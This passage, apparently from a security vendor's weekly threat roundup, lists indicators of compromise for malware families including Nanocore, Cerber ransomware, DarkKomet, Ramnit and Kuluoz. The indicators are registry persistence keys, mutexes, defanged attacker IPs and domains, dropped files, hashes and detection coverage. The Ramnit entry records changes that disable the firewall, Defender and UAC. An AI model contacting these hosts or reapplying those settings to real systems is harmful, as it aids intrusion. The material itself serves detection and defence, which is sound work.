<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {45E760AF-9D6C-3717-3BC0-7CBFD652F80C}
1
<HKCU>\SOFTWARE\MICROSOFT\HOESWE 1
<HKCU>\SOFTWARE\MICROSOFT\HOESWE
Value Name: Riiky
1
Mutexes Occurrences
Local\{825579BC-847F-F0A5-3BC0-7CBFD652F80C} 1
Local\{A3F31C8C-E14F-D103-3BC0-7CBFD652F80C} 1
Local\{A3F31C8D-E14E-D103-3BC0-7CBFD652F80C} 1
GLOBAL\{<random GUID>} 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
193[.]143[.]97[.]30 1
Files and or directories created Occurrences
%TEMP%\tmp100f6b7d.bat 1
%APPDATA%\Epxesy 1
%APPDATA%\Epxesy\veof.okx 1
%APPDATA%\Tioxp 1
%APPDATA%\Tioxp\quem.exe 1

File Hashes

06c09f8aaad2f106a4c64e96906b086bd033cebd96ca266d95bf729f8a68e3b8 0c45a6f787fcb67d8828be0a93b2e5cc9ff08d9a87e68bebc5d6d5d431e0b433 0edf80d5a575a23a2928a6ae7c4a97b2a11a1a9cb40c23521a6de75d8bcf39c8 1db78d1906bfc5ba8367a285c80fd8c67cea7acacd5eb116a7bbd18e77a59023 23905382d08a21e3611db1c290cc86cb22e0f1b493ea2a45f3ca44752a8303d7 2a1b0e3c895993130118782d79dd65b019c660e7b8a4c8af575cde7a5698ae00 2e985914ac0afb33fcbd4311383156af1a79bbe83f57e1225cb86583e6149966 38643489ca7412c15f8d7467d2e1fc622c00b3f6a93ef8ed574c70380de198a7 3e0092e6e6e825556a9e706fd8e3a083001bde9b8a08d8a1dd446ac9f0961cd8 5249e5dc425ceceb4ffd10e04be8fa78ffc8afc4d778fb2773c17f1aa695061c 59d35e5a1e59c4bf032381eeac422223979cbecbd8f668fd917d3bfcea3b7be2 5f897dd59f0621ccd91dfa1d2eb4f965da1b908d9553b4027cd774a18571d15f 65486a839b1c8ff2d4d008ccf33fab7e0404c6a4696fafc5c15961c3816862b8 6cab4306e33f527984b265383d0dea1d11a897b0924b015a2a62700af289edc0 712870bb11fc63cf3d4388668d0c0e707b47c4fc95ff7a0e9b737a50ea3b1c55 8507eafa7e63dc4095cf3424fba1d1a2674752fca8f1d452558d9cbfd0273500 8ac89088823963b316a78e2d5352c06126b1bf176d6a57ceed115cd91d45256b 8c32a4f95a5d1e3eaf9d0ce259f5eea51b4f4d5fb8d75b593e45bb7a776485ea 90c3de2ee8669c7b0cdb3fb57ad911dd40bc0825b32ca3df28687bf22c37098e 92e22ceaf491476477b5962eb64dd52bb7aff8a8e74ebb2dba253604df7525ad b2e2d4451bf745e602446d4d68e76aa1e2e05fde70bee1dcdd283e2f691fd420 b8b6845966466ac1f25c737e86025dc4f5e82fa03947637089ebae7e43c62617 d19a0a01af2ced3e486cf0497204a03fbf2894dca6ef44e680678eed0350b5e9 d515963a214ea51cb885d73263feb275efb94aea759ad92eb395f668f11e1b86 dc792ed152e13f16d0bb6da06dd41091d26d2ad6e724c188bee6c9895ab112ef
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Nanocore-9969309-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: UqRhmjYGcw
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: NoControlPanel
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: FmjwSAKZ\
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: pdb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: wMxdYNJI\
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: kai
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ZeNNLCQY\
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: TpuuyrDY\
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: pbr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: zSCGySDZ\
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: CoZNunCT\
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: zrVxOFxs\
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: PntmHtOf\
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: UzTQIQBw\
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HpnSIvIw\
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: FPZeexxA\
1
Mutexes Occurrences
GLOBAL\{<random GUID>} 9
54b220f4544a7115f31b 2
2AC1A572DB6944B0A65C38C4140AF2F46386E886134 1
Global\534b56e0-35b0-11ed-9660-00151795f450 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
107[.]191[.]99[.]95 2
107[.]191[.]99[.]221 2
192[.]198[.]87[.]78 2
132[.]226[.]247[.]73 2
216[.]38[.]7[.]236 2
95[.]140[.]125[.]73 1
185[.]101[.]34[.]84 1
158[.]101[.]44[.]242 1
95[.]140[.]125[.]64 1
95[.]140[.]125[.]105 1
162[.]248[.]244[.]15 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
checkip[.]dyndns[.]org 3
monerohash[.]com 2
Files and or directories created Occurrences
\<random, matching [a-z]{7,15}> 11
\<random, matching [a-z]{7,15}\[a-z]{7,25}>.exe 11
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 9
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 9
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 9
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 9
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat 9
%System32%\Tasks\AGP Manager 9
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 9
%ProgramFiles(x86)%\AGP Manager 3
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe 3
%System32%\Tasks\AGP Manager Task 3
%TEMP%\test.vbs 2
%LOCALAPPDATA%\AIMDKitteh 2
%LOCALAPPDATA%\AIMDKitteh\mymonero.exe 2
%APPDATA%\pdb 1
%APPDATA%\pdb\pdb.exe 1
%TEMP%\Fp7.exe 1
%APPDATA%\Microsoft\Windows\Templates\4HIM1_BUR_CHOCK_RUBBER_SPACER.pdf 1
%APPDATA%\kai 1
%APPDATA%\kai\kai.exe 1
%APPDATA%\pbr 1
%APPDATA%\pbr\pbr.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\zGMpWbpk.exe.lnk 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SyYwhHOl.exe.lnk 1
*See JSON for more IOCs

File Hashes

10da4db37896cf6b8caa342cf459b7d8f1c441395777bf91f08244d17781f303 1337715195d96f0e051b8da7c6bd4ceec714c780706d195cb44a7da8d8026bc3 24867d30ca0b7ff5aa56efad0007f2dd61f257d9c94f4f65104321756add8c5d 54a92443ad92b755492232393c79a650f38fbcc8e4c5e7edb4a740386be57685 54ef1dcdabc6abd29138ad60375b06c94e9adcf055668187ede39dd7af72d551 618fe651ef4c851931517d762d1d625d8a91dc8ec37c1b4cf1f810ee7107d4eb 652a8000a682aa0e6d66a81e88ebd2d16e67344a500223485e315b3d5b3725d5 8bc4a28c2ace03795a77a619fd9d1fe2b113852a65c5147fe76706549eecdd00 905518b072f0c8f6074a9ea3ef8b2571f949b2a2eec4be87d3d228575050db2e 9c7ddd3eb292885e83f583ee3a84d1a2750c85a62c5ef082f0e8adc45044ebe7 a31e5d93083043137148a1a50547f8f6812cf36e88211a1f371fab588238bd75 d225168def78f1460f3d9599b62267217eef5a36c5e816ee8e5cc0f9059fcf7b e43ed7e08d4b9724bc7653156794825f5a5c12952fdd864e4adcfa530c5f9528 f889ca5350f42fdffeeb49395d7fa2cacadb33e0a909d6a839d4148167ba6c7d f8d613ed7073e4c6aa721caa838af36e8a224eafe998b51dd065ec8745a9b289

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.Cerber-9969274-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
31[.]184[.]234[.]0/23 26
Files and or directories created Occurrences
%TEMP%\d19ab989 26
%TEMP%\d19ab989\4710.tmp 26
%TEMP%\d19ab989\a35f.tmp 26

File Hashes

001887448cac3a58f89bb4f1a8cc8ec45f628706da4e15ebe65429660b2cf825 0033255bc7041027253dc517866af84413f255c5552bcc47fd7e8e660838feed 039fc087b3471228b0be1f67091597e17f33e4cd04b0d2b4be5428657e314631 04097126ab04eef29679935eeaf4c411f04b7a9dfdf3f10bdb5ef7453e6b8692 056ad6d6e3bbd58774ed1ca65fd9b983504185993112a13c5aa54c65be2ca375 05dfa32796c95f0c0ea13074db213d53fab488fdde9afab36ed98c430bc1a930 06e837716cb81498c37c0b621c87acbd2e00d11cf60e27f628ce966702f1a11e 08ce2dac33264f90d5ad8d89bbe56ad0346fc32854a184ed23b15c1cfac81a63 09204adcfbb5041640705d9f80148a1b08ee206ba78d98e071dcdcea77aaf2ad 099ed53d97ba687736ae6e6bcf14c5cc39f65ee933115205c3237cfe19c81015 0b64ca7807d2836760e06c5b4f543d0ae52fa3029552a6e373656770f8eb53f7 109f7711ff16346888c05dbad80214832525d2f962456626e51b90675f4b5e4c 163ecfa1ca0dd985d0487bb496948eb43e2a37ff44a1f833ae1c92b38e269548 19fd3a451086711c12e345a717f0361db12cc8f4a88a3efa66bfa22c96c0e6d7 1a6f8c9f5ab69bfe50d01ab3c321468c6f7ae73091245efe5ec55a4e03f40002 1c09cbf3f181b08879c3cff05c31d0708a9331fddf0eba03e3bbe07ae220a8f8 1cf1dd029fff1b33bd7951e45b7304038c31547e082cabefa656b42e7349ae82 1f27597b0c1b7887511b302efc5fb94b8a241e9736295aeabf84f199f6ccee31 249d96a706928e747acaee7f2bbfa5650f58c957819c262b2cd25e6821f8ece0 270c413b723228cd91400050fbcd8c2eb549f17456f36ff8ad41b63deeb2870c 29598e11fac3a66758910e03c38bb17da6771141a968a1aaf99ae4520bf6c60c 2dde0afe1cf38036b2436a9ca80be179dce9371115ed882bbeb9278563f8d14a 301ca6accba0406fa35115716889892002e30ed8b9d84920b9c5cc2766b0c7f5 30d19efc5ed887ec148f4c280fe5daf01dd6b0098a81d99a864dce3bc8a5f8e4 3b4e4e8fc9b2bf6f7750cd8ed310f8bb4cd7d56ed9989e0fdd929aa5ee27debf
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.DarkKomet-9969269-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKU>\<User SID> 23
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\UNBUR 1
<HKCU>\SOFTWARE\MICROSOFT\UNBUR
Value Name: Ryuplucyc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hyybo.exe
1
<HKCU>\SOFTWARE\MICROSOFT\UNBUR
Value Name: Yqtayfxe
1
Mutexes Occurrences
Global\{08995C04-83FA-2613-1053-58F3B048D958} 23
Global\8bf66b81-fa0d-11ec-b5f8-00501e3ae7b6 1
GLOBAL\{<random GUID>} 1
Local\{<random GUID>} 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
alchemistrywork[.]com 1
Files and or directories created Occurrences
%TEMP%\tmp25673c86.bat 1
%APPDATA%\Otufux 1
%APPDATA%\Otufux\hyybo.exe 1
%APPDATA%\Vooqwo 1
%APPDATA%\Vooqwo\bayk.qua 1

File Hashes

01a66cc3487f0d7e2f27d5a8e69f0c234bdf3304b9ca06fd147fb004a50929f3 03f815c5390528e96c9abf400ce167582eadb1649589b00d39d29b433b03c7b0 2059a4cffd04bc3e04955e20fdd5df1d5d9908d6b9214f8e4c80e10321be77eb 2279feff7534923353197e71c57e3945b8a1efd80d66dcd8e146bcbf1f554a70 3948d73d942c6164c716b5d69041e0ecf9df653e6ece61555e507a745006a3fd 44b484fb9343f45c670e63f286313b09ae005edf5ca0168fb94229dcbd9388aa 4b7e1f682cb8d5dba918cc565714e04d2147663b18ecb9f90deae9ab28bf8f1b 52ccf7455c103e6db02356727227e4bb45d718e0205f28f89349c671997c6c09 62fb8f5173958bb58b2f84a854d08899f14706a6e20e57e3b906965ebd7db6f4 63d42b3e5da3c55a03d2f9b04456632a2f675547b853f142b8245c91bf15100d 68ffff6405e7baecff7f87af41afbbde02844a917a52660a87f36cff3635ccd2 6a0d55b4ed40a705c9e8af25cac6133b4fbb043909e509b1fce274238def0b07 7432dbc42a6785ad8f0cdfbecabcaa38c291e51b3aac8863b3bdfdb1cc1163fd 8350295d5dc2ae0d23d8a4831b461e4103abde3928b9d0f380eb83679fcbf26d 91dc25a40e00e8cc9f5d1074ff80a66ed5c927036e062ce0311a92e5e4b94480 a49071fdf4d34aaf88300a3703227c1fdcd532f9054f848dfbc5c1f15b6fef45 b76165ed0f3f9e8ac42394cf8700e8d8e8c7f4ee89b11c01e81d29b0b4006220 c0bc17998bde718499954f3cf7319b1633405452873b606671204889051cf1a0 c159a657fef9189a28461ac6725bd0a9d6cb1cf4311a3a7d6d95e06130eb629a c42edcd2dbcc690da04afb0d2bb771f2d4aef1e188aa3b8a096c051340b52ab4 c6f4e464c49730bfa10f56fb52a892793cd17f52dbbfc3e60a97a6bc270db136 c88d6a155c90a01b76884456c34f9f9d2670deb255b67e5111a8898ecee06d3c cb03a653a5d69f18b89a24e80b9294c86a08ba48a8bb6fb12223dc2f2b8b45a7 e71370e84a0973f799a58b0ef1e06b4c6343df99343cb778efd26e8257792c0c f574238919b3f09297232f706ab3a0f633aa7259657a0965d2a46a181a3ba266

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Ramnit-9969260-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
7
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 6
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION
Value Name: jfghdug_ooetvtgk
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: JudCsgdy
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
4
<HKCU>\SOFTWARE\APPDATALOW\GOOGLE UPDATER
Value Name: LastUpdate
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\PUBLICPROFILE
Value Name: EnableFirewall
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SSDPSRV
Value Name: Start
3
Mutexes Occurrences
{7930D12C-1D38-EB63-89CF-4C8161B79ED4} 4
60F16AAB662B6A5DA3F649835F6E212598B68E3C 4
777OurStarterProcessMutex777 2
888OurMainProcessMutex888 2
999OurBrother1ProcessMutex999 2
000OurBrother2ProcessMutex000 2
A9MTX7ERFAMKLQ 1
A9ZLO3DAFRVH1WAE 1
B81XZCHO7OLPA 1
BSKLZ1RVAUON 1
GJLAAZGJI156R 1
I106865886KMTX 1
IGBIASAARMOAIZ 1
J8OSEXAZLIYSQ8J 1
LXCV0IMGIXS0RTA1 1
MKS8IUMZ13NOZ 1
NLYOPPSTY 1
OPLXSDF19WRQ 1
PLAX7FASCI8AMNA 1
RGT70AXCNUUD3 1
TEKL1AFHJ3 1
TXA19EQZP13A6JTR 1
VSHBZL6SWAG0C 1
flowblink90x33 1
22887842DFA648B38E6C28C844FF2BE798B68E3C 1
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 5
195[.]201[.]179[.]207 4
142[.]250[.]65[.]206 3
185[.]121[.]177[.]177 2
130[.]255[.]78[.]223 2
185[.]121[.]177[.]53 2
144[.]76[.]133[.]38 2
45[.]63[.]25[.]55 2
27[.]100[.]36[.]191 2
89[.]18[.]27[.]34 2
178[.]63[.]145[.]230 2
104[.]168[.]144[.]17 2
62[.]113[.]203[.]55 2
46[.]165[.]221[.]154 2
85[.]13[.]157[.]3 2
193[.]23[.]244[.]244 1
194[.]109[.]206[.]212 1
154[.]35[.]32[.]5 1
171[.]25[.]193[.]9 1
172[.]217[.]165[.]142 1
65[.]21[.]85[.]98 1
64[.]225[.]91[.]73 1
23[.]47[.]64[.]115 1
104[.]108[.]124[.]205 1
104[.]72[.]157[.]175 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
www[.]bing[.]com 6
google[.]com 4
bunikabatedoba13[.]top 4
bvnotike[.]667[.]top 4
jokimutinke[.]net 4
opiutunuza11[.]net 4
ujnuyteeej[.]top 4
nerdasss33[.]top 4
drdrfdd[.]cat 3
eaxsess[.]cat 3
gagaxx[.]cat 3
huhujoo[.]cat 3
nknkd[.]cat 3
nknkdd[.]cat 3
nknkddx[.]cat 3
nknkddx2[.]cat 3
sdsdfg[.]cat 3
trtr44[.]cat 3
erwwbasmhtm[.]com 2
fbnurqhsbun[.]com 2
h37eyrba720ui[.]com 2
jdnpwbnnya[.]com 2
jhaiujfprlsbpyov[.]com 2
mngawiyhlyo[.]com 2
oxxvnflhtpomjmwst[.]com 2
*See JSON for more IOCs
Files and or directories created Occurrences
%LOCALAPPDATA%\bolpidti 4
%LOCALAPPDATA%\bolpidti\judcsgdy.exe 4
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe 4
%APPDATA%\Microsoft\gawbgrrs 4
%APPDATA%\Microsoft\gawbgrrs\jisgivdt.exe 4
%ProgramData%\Device Driver Setup 3
\$Recycle.Bin\S-1-5-~2\!WhatHappenedWithMyFiles!.rtf 2
%HOMEPATH%\Documents and Settings\!WhatHappenedWithMyFiles!.rtf 2
\$Recycle.Bin\<User SID>\!WhatHappenedWithMyFiles!.rtf 2
%APPDATA%\!WhatHappenedWithMyFiles!.rtf 2
%HOMEPATH%\Documents\!WhatHappenedWithMyFiles!.rtf 2
\Users\All Users\Microsoft\RAC\PublishedData\!WhatHappenedWithMyFiles!.rtf 2
\Users\All Users\Microsoft\RAC\StateData\!WhatHappenedWithMyFiles!.rtf 2
%ProgramData%\Microsoft\RAC\PublishedData\!WhatHappenedWithMyFiles!.rtf 2
%ProgramData%\Microsoft\RAC\StateData\!WhatHappenedWithMyFiles!.rtf 2
%ProgramData%\Microsoft\RAC\PUBLIS~1\!WhatHappenedWithMyFiles!.rtf 2
\Users\ALLUSE~1\Microsoft\RAC\PUBLIS~1\!WhatHappenedWithMyFiles!.rtf 2
%ProgramData%\Microsoft\RAC\STATED~1\!WhatHappenedWithMyFiles!.rtf 2
\Users\ALLUSE~1\Microsoft\RAC\STATED~1\!WhatHappenedWithMyFiles!.rtf 2
%TEMP%\<random, matching '[0-9a-z]{8}'>.exe 2
%APPDATA%\SjyNBvm6RTID\9x56BxjU.cmd 1
%APPDATA%\Microsoft\cciihiec\jisgivdt.exe 1
%APPDATA%\SjyNBvm6RTID\XvNigAX3.cmd 1
%APPDATA%\SJYNBV~1\165TprqR.exe 1
%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\165TprqR.lnk 1
*See JSON for more IOCs

File Hashes

0b2ad4aa2b64aae559973ec324330f137fd4c9546aeb2c2f9c35b5617b180c05 102092d52e39ed386a890d2687b4e80da6a0372f89ee2b83a8c29b3a13d22788 147569cb85cffa13769376d5da1c8ec7487443b710faf19afab24a021a58913b 25727f1d115764349d0cbd828598d52140640be6eade12e62ff3438525004630 5280855d2a67a6ba91900af80c235b1bafb51151cba3f7bff7566efda8d0ee09 5462ceb3fbab158b53c3c247d939183c89eb96229c8f78fdc61e44f1a939bfa4 60a52492d31994057a2d0566ccf469393fad834cabe943a89bbdb9d07852626a 7234d6a648ff98721f0045dcda255767f0f6d19a1cccea8c8e7db97f594da4bd 72d6c6b95eeaae1b2777d70ac14b122ca72874f1d98680d52dc9b27b2b66ded0 72f5a9c942d7d5efd18390cb99539d7f411983bb9c41f8137f0a2c5a7bb66152 73ed34beba387409f4bdfd3413079d3a50e49380a1ad39c5f8d67b1ea4d04aaf 7cb1a756133840264574c4683e437accbe24b254e853a17588a5c67e7858369a 868dc997d2fa2123e8035eb565d940542b9d7b363c54e177cc85dcd89529ab94 8cbebde91c55c93149db657c63fc480e5639f85f6f072a538b0155d3a5bec4bd 93cd72fbca2dbb3d75f972cfac420aaf1d007824b073f6bef7944108543c5c5b 9e67e77db32641775ebdcce463fe21b195539417d20168fac7209908825578d7 a2d53ce7f45959e6ca5786f0d0704a5f9056789b4d7afaf7bf93bc74ddf3e5dc a67bc1d4129d487029cbd0836241425213ed5b57806a089d427703d69b87a80a b48b525ec88d26ca83b1a80e16fc90bfe163e09e183df73009c8f6de39c24f99 bc703ff3117b8088ce29ba90a2a25708a845503b6a76946082f86787f53f6d93 bca38bba430425ae06eeff67707b04730cabdab8c28c5d7edb73a704d9a12ab0 c3a619f1b3493485405947c2eb13ade0def13b84ea9350def3a936c916dc9755 c71a94e585e6a8f225e97df8e8c5ee8d8224fdd265731205e9179f979e6d5787 c9702ab60a3acdb6319b30c7723ba448e544f72c9658e7169753d2ba6033f74b d677ac549428b51974e92573bd1aeb3869d58b2a23d3cc0e116473213678f237
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Kuluoz-9969050-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 15
<HKCU>\SOFTWARE\SQFRVCDX
Value Name: qbdiucws
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: vecqtanl
1
<HKCU>\SOFTWARE\QMBDQAJI
Value Name: mrwduoeq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: cegwtkiq
1
<HKCU>\SOFTWARE\XSCWKWTB
Value Name: uaclqbul
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ucbqtutu
1
<HKCU>\SOFTWARE\JBDLTTQA
Value Name: mrwedtqx
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: vqutjntj
1
<HKCU>\SOFTWARE\JFXJSONS
Value Name: fecipfcv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: arwphoht
1
<HKCU>\SOFTWARE\PCJDWGMU
Value Name: cjpxnmpf
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nhloowrs
1
<HKCU>\SOFTWARE\USMUVJEA
Value Name: hbijvefk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: conoxmsr
1
<HKCU>\SOFTWARE\UBVPEQTD
Value Name: bvqcqshx
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ukvchxne
1
<HKCU>\SOFTWARE\HBTTNUTT
Value Name: aeulprit
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: frrvhaca
1
<HKCU>\SOFTWARE\VUSJFBBT
Value Name: mpxwxiew
1
